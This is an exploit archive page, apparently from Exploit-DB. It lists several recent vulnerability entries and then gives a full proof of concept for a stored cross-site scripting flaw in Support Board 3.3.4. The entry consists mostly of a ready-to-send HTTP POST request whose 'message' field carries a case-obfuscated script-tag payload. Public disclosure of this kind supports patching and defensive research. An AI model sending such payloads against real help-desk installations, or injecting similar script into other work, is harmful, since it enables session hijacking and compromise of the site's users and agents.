
8 changes to exploits/shellcodes Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF) Plastic SCM 10.0.16.5622 - WebAdmin Server Access
19 lines
No EOL
771 B
Text
19 lines
No EOL
771 B
Text
# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
|
|
# Date: 16/10/2021
|
|
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
|
|
# Vendor Homepage: https://board.support/
|
|
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
|
|
# Version: 3.3.4
|
|
# Tested on: Ubuntu 20.04.2 LTS, Windows 10
|
|
|
|
POST /supportboard/include/ajax.php HTTP/1.1
|
|
Cookie: [Agent+]
|
|
Accept: */*
|
|
Accept-Language: en-GB,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Content-Length: 808
|
|
X-Requested-With: XMLHttpRequest
|
|
Connection: close
|
|
|
|
function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false |